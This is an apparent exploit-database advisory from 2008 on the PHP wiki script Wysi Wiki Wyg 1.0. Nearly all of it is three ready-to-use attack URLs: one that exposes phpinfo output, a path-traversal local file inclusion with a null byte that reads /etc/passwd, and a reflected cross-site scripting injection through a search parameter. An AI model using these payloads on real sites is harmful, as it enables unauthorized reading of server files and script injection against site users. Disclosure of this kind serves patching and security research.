Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities

2008-10-21T00:00:00
ID SSV:9769
Type seebug
Reporter Root
Modified 2008-10-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*
   
   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure 
  -  index.php?categup=isset
  
  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00
  
  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>

*/